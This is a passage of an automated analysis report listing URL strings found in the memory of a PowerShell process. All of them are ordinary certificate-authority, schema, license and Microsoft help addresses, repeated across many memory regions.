Source: powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0W
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021601981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1929469102.0000021600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: powershell.exe, 00000000.00000002.1929469102.0000021601CC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000000.00000002.1929469102.0000021600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
